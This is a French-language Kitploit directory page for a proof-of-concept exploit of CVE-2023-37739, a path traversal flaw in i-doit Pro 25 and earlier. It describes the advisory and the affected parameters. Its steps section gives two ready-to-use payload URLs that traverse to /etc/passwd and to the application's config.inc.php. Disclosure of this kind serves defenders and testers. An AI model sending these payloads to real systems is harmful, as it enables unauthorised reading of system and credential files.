Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below — Exploit de preuve de concept pour CVE-2023-37739, une vulnérabilité de traversée de chemin dans i-doit Pro 25 et versions antérieures permettant aux utilisateurs authentifiés de lire des fichiers sensibles via des paramètres moduleID et file falsifiés. | Kitploit
Outils/GitHubGitHub/leekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubleekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below

CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below

Exploit de preuve de concept pour CVE-2023-37739, une vulnérabilité de traversée de chemin dans i-doit Pro 25 et versions antérieures permettant aux utilisateurs authentifiés de lire des fichiers sensibles via des paramètres moduleID et file falsifiés.

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-37739 - Chemin de traversée dans i-doit Pro 25 et versions antérieures

i-doit Pro 25 et versions antérieures sont vulnérables à une vulnérabilité de type Chemin de traversée. Ces vulnérabilités pourraient permettre à des attaquants authentifiés à distance (faible ou haute privilège) de naviguer vers des emplacements qui ne devraient pas être accessibles à l'utilisateur. Elle peut être utilisée pour lire et/ou accéder à des fichiers sensibles.

Description du produit : i-doit est une documentation IT basée sur le web et une CMDB (Configuration Management Database) développée par synetics GmbH. i-doit Pro est la version commerciale du logiciel et nécessite une licence payante. Il offre des fonctionnalités supplémentaires, un support professionnel, ainsi que des mises à jour et des améliorations régulières. Les utilisateurs doivent acheter une licence pour utiliser i-doit Pro, et le coût varie en fonction du nombre d'utilisateurs et des fonctionnalités requises.

Description de la vulnérabilité : Nous avons constaté que cette application web permet à tout utilisateur authentifié de naviguer vers des emplacements qui ne devraient pas être accessibles à l'utilisateur. Elle peut être utilisée pour lire et/ou accéder à des fichiers sensibles...

Page Web affectée : /?moduleID et /index.php

Paramètre et composant affectés 1 : ?moduleID=2&file_manager=image&file

Paramètre et composant affectés 2 : ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=

Étape 1 : connectez-vous en tant qu'utilisateur valide, il peut s'agir d'un utilisateur à faible privilège ou à haute privilège. Accédez à l'URL ci-dessous, modifiez le ../../../ vers le fichier que vous souhaitez lire ou accéder.

step1

exemple 1 : http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd

exemple 2 : http://IP/index.php?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=../../../src/config.inc.php

step2

step3

step4

Télécharger l’outil